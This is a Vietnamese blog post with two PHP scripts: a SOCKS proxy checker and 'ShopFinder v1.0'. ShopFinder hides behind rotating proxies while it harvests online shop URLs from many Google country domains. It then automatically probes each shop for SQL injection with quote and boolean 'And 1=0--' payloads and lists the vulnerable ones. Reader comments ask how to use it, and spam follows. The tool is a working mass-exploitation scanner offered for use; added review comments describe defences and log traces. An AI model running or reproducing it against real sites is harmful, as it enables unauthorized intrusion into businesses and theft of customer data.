Thứ Ba, 15 tháng 3, 2011

tool search shop by hoangduye

code check sock trước

Code:
<title>check sock</title>
<form action="" method="POST">
<textarea name="sock" cols="50" rows="20"></textarea>
<input type="submit" value="check" name="submit1" />
</form><br>
<?php
    // Remove PHP's execution time limit for this request; the '@' hides any warning the call raises.
    @set_time_limit(0);
    /**
     * Pull the first "a.b.c.d:port"-shaped token out of a line of pasted text.
     *
     * Every digit in the pattern is optional (up to three per octet, up to five for the
     * port), so this is a loose extractor, not a validator: a bare "...:" also matches.
     *
     * @param string $info One line of input.
     * @return string|null The matched substring; when nothing matches, index 0 is unset
     *                     and PHP yields null with a warning.
     */
    function get_sock($info)
    {
        $pattern = "/[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?:[0-9]?[0-9]?[0-9]?[0-9]?[0-9]?/";
        $found = array();
        preg_match($pattern, $info, $found);

        return $found[0];
    }

    /**
     * Fetch $url through the SOCKS5 proxy $proxy and return what curl_exec() gives back.
     *
     * @param string $url   Address to request.
     * @param string $proxy Proxy in "host:port" form (the caller passes the output of get_sock()).
     * @return string|false Response body, or false when the transfer fails (CURLOPT_RETURNTRANSFER is on).
     */
    function get_page($url,$proxy)
    {
        $ch=curl_init();
        // Return the body from curl_exec() instead of printing it.
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        // Every request is forced through the supplied proxy, treated as SOCKS5.
        curl_setopt($ch,CURLOPT_PROXY,$proxy);
        curl_setopt($ch,CURLOPT_PROXYTYPE,CURLPROXY_SOCKS5);
        curl_setopt($ch,CURLOPT_HTTPPROXYTUNNEL,1);
        // Cookies are read from and written to one hard-coded local file shared by all requests.
        curl_setopt($ch,CURLOPT_COOKIEFILE,"C:\xampp\htdocs\check\cookie.txt");
        curl_setopt($ch,CURLOPT_COOKIEJAR,"C:\xampp\htdocs\check\cookie.txt");
        curl_setopt($ch,CURLOPT_URL,$url);
        // Give up after 5 seconds in total.
        curl_setopt($ch,CURLOPT_TIMEOUT,5);
        $page=curl_exec($ch);
        curl_close($ch);
        return $page;
    }
    // Form handler: test each pasted proxy by sending one Google search request through it.
    if(isset($_POST["sock"]))
    {
        // One candidate per line of the textarea.
        $sock=explode("\n",$_POST["sock"]);
        $i=0;
        $arrSock = array();
        // Walk the list until the first empty entry.
        while($sock[$i]!="")
        {
            // Reduce the line to its "ip:port" part.
            $sock[$i]=get_sock(trim($sock[$i]));
            $page=get_page("http://www.google.com.vn/search?q=allinurl:admin.asp?id=",$sock[$i]);
            // A proxy counts as usable when a non-empty body came back and "302 Moved" was not
            // found in it (loose comparison on the strpos() result).
            if($page!="" && strpos($page,"302 Moved")==false)
            {
                echo "<font color='green'>".$sock[$i]."</font><br>";ob_flush();flush();
                array_push($arrSock,$sock[$i]);
            }
            else
            {
                echo "<font color='red'>".$sock[$i]."</font><br>";ob_flush();flush();
            }
            $i++;
        }
        // Print the proxies that passed, one per line, in a textarea for copying.
        echo "====List sock ok====<br>";
        $x = join("\r\n",$arrSock);
        echo "<textarea rows='10' cols = '20'>".$x."</textarea>";
    }
?>
tool check shop
Code:
<title>ShopFinder v1.0</title>
<form action="" method="POST">
<table>
    <tr><td>List keywords</td><td>List socks</td></tr>
    <tr><td><textarea name="keyword" cols=40 rows=15>google nha'</textarea></td><td><textarea name="sock" cols=40 rows=15>sock nha'</textarea></td></tr>
    <tr><td></td><td><input type="submit" value="start" /></td></tr>
</table>
</form>
<?php

    ######################
    # helper functions   #
    ######################
    /**
     * Fetch $url with cURL, optionally through a SOCKS5 proxy, and return the body.
     *
     * Review note (detection): every request made through this function carries the fixed
     * User-Agent literal set below, including its literal '?' and '*' characters. That exact
     * string is a stable value to search for in web-server access logs.
     *
     * @param string $url   Address to request.
     * @param string $proxy "host:port" of a SOCKS5 proxy; any falsy value (the callers in this
     *                      file pass "") means no proxy options are set.
     * @return string|false Response body, or false when the transfer fails.
     */
    function getPage($url,$proxy)
    {
        $ch=curl_init();
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

        // SOCKS5 proxy, applied only when a proxy value was supplied
        if($proxy)
        {
            curl_setopt($ch,CURLOPT_PROXY,$proxy);
            curl_setopt($ch,CURLOPT_PROXYTYPE,CURLPROXY_SOCKS5);
            curl_setopt($ch,CURLOPT_HTTPPROXYTUNNEL,1);
        }

        // User-Agent header: one hard-coded value for all requests
        $agent = "Mozilla/5.0 (Windows; ?; Windows NT 5.1; *rv:*) Gecko/* Firefox/0.9*";
        curl_setopt($ch,CURLOPT_USERAGENT,$agent);

        curl_setopt($ch,CURLOPT_URL,$url);
        // Overall timeout of 10 seconds per request.
        curl_setopt($ch,CURLOPT_TIMEOUT,10);
        $page=curl_exec($ch);
        curl_close($ch);
        return $page;
    }
    /**
     * Reduce a URL to a bare host name by plain string replacement.
     *
     * Removes every "http://" and then every "www." occurrence, and finally deletes
     * everything from the first "/" onward. No URL parsing is involved, so other schemes
     * are not recognised (an "https://" URL collapses to "https:").
     *
     * @param string $url URL or "host/path" string.
     * @return string The remaining host part.
     */
    function getDomain($url)
    {
        // An array search is applied in order, each step on the previous result.
        $stripped = str_replace(array("http://", "www."), "", $url);
        $pathPart = strstr($stripped, "/");

        return str_replace($pathPart, "", $stripped);
    }
    /**
     * Report whether none of the given keywords is found inside $str.
     *
     * The check uses the truthiness of strpos(), so only a hit at an offset greater than
     * zero counts as "found".
     *
     * @param array  $arrFilterKeyword Keywords to look for.
     * @param string $str              Text to search.
     * @return bool false as soon as one keyword is found, true otherwise.
     */
    function notInStr($arrFilterKeyword,$str)
    {
        $noneFound = true;
        foreach ($arrFilterKeyword as $needle) {
            if (strpos($str, $needle)) {
                $noneFound = false;
                break;
            }
        }

        return $noneFound;
    }
    /**
     * Normalise a fetched page so that two responses can be compared as strings.
     *
     * The page is HTML-entity encoded, every "=" is swapped for the marker "vndarkcode"
     * (check_sql_injection() later splits on that marker), and then all whitespace, every
     * "http" and every double quote are removed.
     *
     * @param string $page Raw response body.
     * @return string The normalised text.
     */
    function cleanUpPage($page)
    {
        $text = str_replace("=","vndarkcode",htmlentities($page));
        foreach (array("/[\s]/","/http/","/\"/") as $pattern) {
            $text = preg_replace($pattern,"",$text);
        }

        return $text;
    }
    /**
     * Decide whether a candidate link is worth testing: 1 to keep it, 0 to drop it.
     *
     * Two checks run in order, both fetched with an empty proxy argument:
     *  1. The link's domain is looked up on alexa.com and the traffic rank is scraped from the
     *     HTML; the link is dropped when the rank is above $rankAlexa or no digit was found.
     *  2. The link itself is fetched; it is dropped when none of the $arrSearch keywords is
     *     found in the entity-encoded page (see notInStr()).
     *
     * @param string $link      Candidate URL.
     * @param int    $rankAlexa Largest rank number still accepted.
     * @param array  $arrSearch Keywords the page has to contain.
     * @return int 1 or 0.
     */
    function filter($link,$rankAlexa,$arrSearch)
    {
        $page=getPage("http://www.alexa.com/search?q=".getDomain($link)."&r=home_home&p=bigtop","");
        // Flatten to one line so the regexes below can match across the original line breaks.
        $page=str_replace("\n","",$page);
        preg_match("/Alexa[\s]Traffic[\s]Rank:(.*?)\/a\>/",$page,$tmp);
        preg_match("/\"\>(.*)\</",$tmp[1],$result);
        //echo (intval(str_replace(",","",$result[1])));ob_flush();flush();
        // Strip thousands separators before comparing; a value without any digit is rejected too.
        if(intval(str_replace(",","",$result[1])) > $rankAlexa || !preg_match("/\d/",str_replace(",","",$result[1])))
            return 0;


        $page = htmlentities(getPage($link,""));
        //echo $page;ob_flush();flush();
        // notInStr() is true when none of the keywords was found.
        if(notInStr($arrSearch,$page))
            return 0;

        return 1;

    }


    #######################
    # worker functions    #
    #######################
    /**
     * Collect result links for one search keyword from a fixed list of Google country domains.
     *
     * For each domain the result pages are requested 100 at a time through the current proxy.
     * An empty response, the "answer=86640" support link or "302 Moved" in the body makes the
     * function switch to the next proxy and repeat the page; when no proxy is left the script
     * exits with the message "nap. them^ sock di" (Vietnamese for "load more socks").
     *
     * A link is kept when it passes the keyword filter, its domain is not yet in
     * $arrDomainChecked, and it contains "?" or a numeric path segment such as "/123/".
     *
     * Review note (defence): the kept links are exactly the URL shapes this script later probes,
     * so parameterised pages reachable from search results are what it selects.
     *
     * @param string $keyword           URL-encoded search terms.
     * @param array  $arrFilterKeyword  Substrings that disqualify a link.
     * @param array  $arrDomainChecked  Domains already collected.
     * @param array  $arrSock           Proxies in "host:port" form.
     * @return array List of "http://"-prefixed links.
     */
    function getLinksFromGoogle($keyword,$arrFilterKeyword,$arrDomainChecked,$arrSock)
    {
        // Start with the last proxy in the list.
        $sockUsing = array_pop($arrSock);
        // Upper bound for the "start" paging offset.
        $limit = 200000;
        $arrGoogle = array(
            "google.com",
            "google.ca",
            "google.com.au",
            "google.co.uk",
            "google.fr",
            "google.ch",
            "google.com.vn",
            "google.nl",
            "google.es",
            "google.ie",
            "google.de",
            "google.co.jp"
        );

        $arrLink = array();

        foreach($arrGoogle as $google)
        {
            // $h is the paging offset passed as "start".
            $h = 0;
            while($h < $limit +1)
            {
                $urlGoogle = "http://www.".$google."/search?&q=".$keyword."&start=".$h."&num=100&filter=1&tbs=cpk:1";
                //echo $urlGoogle."<br>";ob_flush();flush();
                $pageGoogle = getPage($urlGoogle,$sockUsing);

                // Nothing came back: take the next proxy and step the offset back so this page is retried.
                if($pageGoogle == "")
                {
                    if($sockUsing = array_pop($arrSock))
                    {
                        $h = $h - 100;
                    }
                    else
                    {
                        exit("nap. them^ sock di");
                    }
                }
                // No results for this keyword on this domain.
                if(strpos($pageGoogle,"did not match any documents")==true)
                {
                    break;
                }
                // The search engine answered with its block/redirect page: rotate the proxy as above.
                if(strpos($pageGoogle,"http://www.".$google."/support/websearch/bin/answer.py?answer=86640")==true || strpos($pageGoogle,"302 Moved")==true)
                {
                    if($sockUsing = array_pop($arrSock))
                    {
                        $h = $h - 100;
                    }
                    else
                    {
                        exit("nap. them^ sock di");
                    }
                }

                // Every href="http://..." value on the page is a candidate link.
                preg_match_all("/href=[\"]http:\/\/(.*?)\"/",$pageGoogle,$line);
                $i=0;
                while($line[1][$i]!="")
                {
                    if(notInStr($arrFilterKeyword,$line[1][$i]) && !in_array(getDomain($line[1][$i]),$arrDomainChecked) && (preg_match("/\?/",$line[1][$i]) || preg_match("/\/(\d+)\//",$line[1][$i])))
                    {
                        array_push($arrLink,"http://".$line[1][$i]);
                        array_push($arrDomainChecked,getDomain($line[1][$i]));
                    }
                    $i++;
                }
                // Stop paging when the page holds no reference to the next offset.
                if((!strpos($pageGoogle,"start=".($h+100))))
                {
                    break;
                }
                $h += 100;
            }
        }
        // Put the proxy that is still in use back on the list.
        array_push($arrSock,$sockUsing);
        return $arrLink;
    }

    /**
     * Probe one URL for signs of SQL injection; return the first probe URL that looks
     * injectable, or 0 when none does.
     *
     * Probe URLs are built by appending a single quote to the whole URL. For URLs with a query
     * string a quote is also inserted in front of each "&"; for URLs with a numeric path segment
     * ("/123/") a quote is instead placed after each occurrence of those numbers.
     *
     * Each probe is fetched with getPage() using an empty proxy argument. A probe is reported when
     *  (1) the cleaned, lower-cased response contains "sql" past offset 0, or
     *  (2) the response differs from the same request without the quote and, for one of four
     *      boolean-condition triples, more than 10 of the "="-separated chunks differ between
     *      the false condition and the first true condition while both true conditions agree.
     *
     * Review note (defence): check (1) depends on database error text reaching the client and
     * check (2) on query results changing with a condition taken from the URL. Parameterised
     * queries remove both, and turning off error display removes (1). In access logs one run
     * shows the same path requested with a trailing quote, then without it, then with
     * "And 1=0", "And 1=1" and "And 2=2" variants in that order.
     *
     * @param string $url URL to probe.
     * @return string|int The probe URL that matched, or 0.
     */
    function check_sql_injection($url)
    {
        if(preg_match("/\?/",$url))
        {
            // Record the offset of every "&" in the URL.
            $pos[0]=strpos($url,"&");$i=1;
            while($pos[$i]=strpos($url,"&",$pos[$i-1]+1))
            {
                $i=$i+1;
            }
            // Probe 0: quote at the very end; further probes: quote in front of each "&".
            $array_url[0]=stripslashes($url."'");$i=1;
            while(!$pos[$i-1]=="")
            {
                $temp2=substr($url,$pos[$i-1]);
                $temp1=substr_replace($url,"'",$pos[$i-1]);
                $array_url[$i]=stripslashes($temp1.$temp2);
                $i=$i+1;
            }
        }
        elseif(preg_match("/\/(\d+)\//",$url))
        {
            // Path-style URL: quote at the end, then one probe per numeric segment.
            $array_url[0]=stripslashes($url."'");
            preg_match_all("/\/(\d+)\//",$url,$result);
            foreach($result[1] as $var)
                array_push($array_url,stripslashes(str_replace($var,$var."'",$url)));
        }

        $i=0;
        while(!$array_url[$i]=="")
        {
            //echo $array_url[$i]."<br>";ob_flush();flush();
            $page = strtolower(cleanUpPage(getPage($array_url[$i],"")));


            // Check (1): the text "sql" appears in the response.
            if(strpos($page,"sql"))
            {
                return $array_url[$i];
            }
            else
            {
                // Continue only when the quote changed the response at all.
                if($page != strtolower(cleanUpPage(getPage(str_replace("'","",$array_url[$i]),""))))
                {
                    //echo 1;ob_flush();flush();
                    // Four triples of (false, true, true) conditions in different comment/quote styles.
                    $arrCheck = array(
                    array("%20And%201=0--","%20And%201=1--","%20And%202=2--"),
                    array("%20'%20And%201=0+--+","%20'%20And%201=1+--+","%20'%20And%202=2+--+"),
                    array("%20/*!%20And%201=0*/--","%20/*!%20And%201=1*/--","%20/*!%20And%202=2*/--"),
                    array("%20'/*!%20And%201=0*/+--+","%20'/*!%20And%201=1*/+--+","%20'/*!%20And%202=2*/+--+"));
                    foreach($arrCheck as $check)
                    {
                        // The quote in the probe URL is replaced by each condition; the pages are
                        // split on the "vndarkcode" marker that cleanUpPage() put in place of "=".
                        $a = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[0],$array_url[$i]),"")));

                        $b = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[1],$array_url[$i]),"")));

                        $c = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[2],$array_url[$i]),"")));

                        // Count chunks where false != true while both true responses agree.
                        $d = 0;
                        for($k=0;$k<=count($a);$k++)
                        {
                            if(($a[$k] != $b[$k]) && ($b[$k] == $c[$k]))
                                $d++;
                        }


                        // Check (2): more than 10 such chunks.
                        if($d > 10)
                        {
                            return $array_url[$i];
                        }
                    }
                }
            }

            $i=$i+1;
        }
        return 0;
    }

    /**
     * Look for further parameterised pages on one site via a "site:<domain>+filetype:<type>"
     * search and pass each to check_sql_injection().
     *
     * The search is sent to google.com through the current proxy for at most 10 rounds, with
     * the same proxy rotation and exit-on-exhaustion behaviour as getLinksFromGoogle(). Result
     * links without "?" only add an exclusion term to the query; links with "?" are probed once
     * per distinct name captured between the first "/" and the following ".".
     *
     * @param string $url      A link on the site to examine.
     * @param string $fileType File extension used in the "filetype:" operator (the caller passes "php").
     * @param array  $arrSock  Proxies in "host:port" form.
     * @return string|int The probe URL reported by check_sql_injection(), or 0.
     */
    function scanDetail($url,$fileType,$arrSock)
    {
        $sockUsing = array_pop($arrSock);
        $keyword="site:".getDomain($url)."+filetype:".$fileType;
        // Names already probed on this site.
        $blackList = array();
        // Round counter, 1 to 10.
        $end=1;
        while($end<=10)
        {
            $urlGoogle="http://www.google.com/search?q=".$keyword."&start=0&num=100";
            $pageGoogle=getPage($urlGoogle,$sockUsing);
            // Empty response: switch proxy and do not count this round.
            if($pageGoogle == "")
            {
                if($pageGoogle == "")
                {
                    if($sockUsing = array_pop($arrSock))
                    {
                        $end = $end - 1;
                    }
                    else
                    {
                        exit("nap. them^ sock di");
                    }
                }
            }
            if(strpos($pageGoogle,"did not match any documents")==true)
            {
                break ;
            }
            // Block/redirect page from the search engine: switch proxy as above.
            if(strpos($pageGoogle,"http://www.google.com/support/websearch/bin/answer.py?answer=86640")==true || strpos($pageGoogle,"302 Moved")==true)
            {
                if($sockUsing = array_pop($arrSock))
                {
                    $end = $end - 1;
                }
                else
                {
                    exit("nap. them^ sock di");
                }
            }
            preg_match_all("/href=\"http:\/\/(.*?)\"/",$pageGoogle,$line);
            $i=0;
            while($line[1][$i]!="")
            {
                // Skip links that belong to the search engine itself or to other listed sites.
                if(!preg_match("/google.com|youtube.com|cache|alexa.com|search\?/",$line[1][$i]))
                {
                    if(!preg_match("/\?/",$line[1][$i]))
                    {
                        // No query string: only exclude this name from the next search.
                        preg_match("/\/(.*?)\./",$line[1][$i],$file);
                        $keyword=$keyword."+-".$file[1].".".$filetype;
                    }
                    else
                    {
                        preg_match("/\/(.*?)\./",$line[1][$i],$file);
                        if(!in_array($file[1],$blackList))
                        {
                            // First link seen for this name: probe it and stop at the first hit.
                            $result = check_sql_injection("http://".$line[1][$i]);
                            if($result)
                            {
                                array_push($arrSock,$sockUsing);
                                return $result;
                            }
                            $keyword=$keyword."+-".$file[1].".".$fileType;
                            array_push($blackList,$file[1]);
                        }
                    }
                }
                $i=$i+1;
            }
            if((!strpos($pageGoogle,"start=".($h+100))))
            {
                break;
            }
            $end=$end+1;
        }
        array_push($arrSock,$sockUsing);
        return 0;
    }
    // Form handler: for every submitted keyword, collect links, filter them and probe what is left.
    if(isset($_POST["keyword"]) && isset($_POST["sock"]))
    {

        // No execution time limit for this request.
        set_time_limit(0);

        // only check shops whose rank number is below 5 million
        $rankAlexa = 5000000;

        // keywords that have to be present in the page
        $arrSearch = array("price","cart","basket","$","add to");


        // links containing any of these words are discarded
        $arrFilterKeyword = array("google","wikipedia.org","youtube.com","alexa.com","yahoo.com","javascript:void","cache","rapidshare.com","mysql.com","php.net","bing.com","msn.com","microsoft.com","union","torrent","live.com","microsofttranslator.com","amazon.com","facebook.com","info.com","Info.com","order+by","..","'","forum","forum.","hack","security","milw0rm.com","exploit","ebay.com","apple.com","blog",".xml","flickr.com",".pdf",".txt","\"",".vn","india",".in",".cn",".kr",".jp",".hk",".hu",".li",".ru","thailand","thai",".tw","taiwan");


        echo "<font color='red'><h3>[+]Shop finder v1.0 code by vndarkcode</h3></font>";ob_flush();flush();


        // Both textareas are split on CRLF: one proxy and one keyword per line.
        $arrSock = explode("\r\n",$_POST["sock"]);
        $arrDomainChecked = array();

        $arrKeyword = explode("\r\n",$_POST["keyword"]);


        foreach($arrKeyword as $keyword)
        {
            echo "<font color='green'>[+]Checking keyword : ".$keyword."</font><br>";ob_flush();flush();
            echo "&nbsp;&nbsp;<font color='brown'>[*]Geting links from google</font><br>";ob_flush();flush();

            // URL-encode the keyword but keep spaces and "+" as "+" separators ("xxx" is a temporary stand-in).
            $keyword = ltrim($keyword);
            $keyword = rtrim($keyword);
            $keyword = str_replace(" ","xxx",$keyword);
            $keyword = str_replace("+","xxx",$keyword);
            $keyword = urlencode($keyword);
            $keyword = str_replace("xxx","+",$keyword);

            $arrLink = getLinksFromGoogle($keyword,$arrFilterKeyword,$arrDomainChecked,$arrSock);

            echo "&nbsp;&nbsp;<font color='brown'>[*]Found ".count($arrLink)." shops</font><br>";ob_flush();flush();
            echo "&nbsp;&nbsp;<font color='brown'>[*]Finding bug shops</font><br>";ob_flush();flush();
            // $i counts the links reported for this keyword.
            $i = 0;
            foreach($arrLink as $link)
            {
                // Only links that pass the rank and page-keyword checks are probed.
                if(filter($link,$rankAlexa,$arrSearch))
                {
                    $result = check_sql_injection($link);
                    if($result)
                    {
                        echo "&nbsp;&nbsp;<a href=\"".$result."\" target='_blank'>".$result."</a> => sql injection<br>";ob_flush();flush();$i++;
                    }
                    else
                    {
                        // The link itself gave no result: search the same site for other ".php" pages.
                        $result = scanDetail($link,"php",$arrSock);
                        if($result)
                        {
                            echo "&nbsp;&nbsp;<a href=\"".$result."\" target='_blank'>".$result."</a> => sql injection<br>";ob_flush();flush();$i++;
                        }
                    }
                }
            }

            echo "&nbsp;&nbsp;<font color='brown'>[*]Found ".$i."/".count($arrLink)." bugs shop</font><br>";ob_flush();flush();
            echo "&nbsp;&nbsp;<font color='brown'>[*]Done</font><br>";ob_flush();flush();
        }
    }

?>
anh em chú ý edit các chỗ màu đỏ nhé

8 nhận xét:

Nặc danh nói...

em chang hieu gi

Nặc danh nói...

K hiểu gì hết, cái này dùng sao vậy a...
a có thể cho e link down của 1 tools tìm shop lỗi sql được k ak`... chứ như thế này... e chịu... thanks a trước

zeko sock nói...

đây là code php ......

Nặc danh nói...

sử dụng như thế nào...nhúng vào web a

Mr. Nam nói...

Xem phim online, Chúng tôi luôn mang đến cho các bạn những cộ phim hay nhất, mới nhất với độ load nhanh nhất, bạn không cần phải tốn nhiều thời gian để ì ạch xem 1 bộ phim yêu thích nào đó, giờ đây thật nhanh chóng bạn chỉ cần bấm và xem. Ngoài ra bạn có thể xem phim Full-HD mà không phải mất bất kỳ mức phí nào như:
xem phim hd
xem phim oan hồn
xem phim lật mặt
xem phim bom tấn Attack on Titan
xem phim đạo hạ sơn 2015
xem phim đạo sĩ hạ sơn
xem phim Bạo Phong Ngữ
xem phim cổ trang lữ hậu 2015
xem phim Đao Hạ Lưu Tình được TVB
xem phim Tung Hoành Hollywood
xem phim báu vật thành cát tư hãn
xem phim mười năm của chúng ta
xem phim ngọa hổ tàng long 2
phim hoa lệ chuyển thân
Phim nữ thần lửa jung yi tập cuối

Duy Quang nói...

anonyviet.com

Duy Quang nói...

http://anonyviet.com

impotence nói...

Yes! Finally someone writes about %keyword1%.
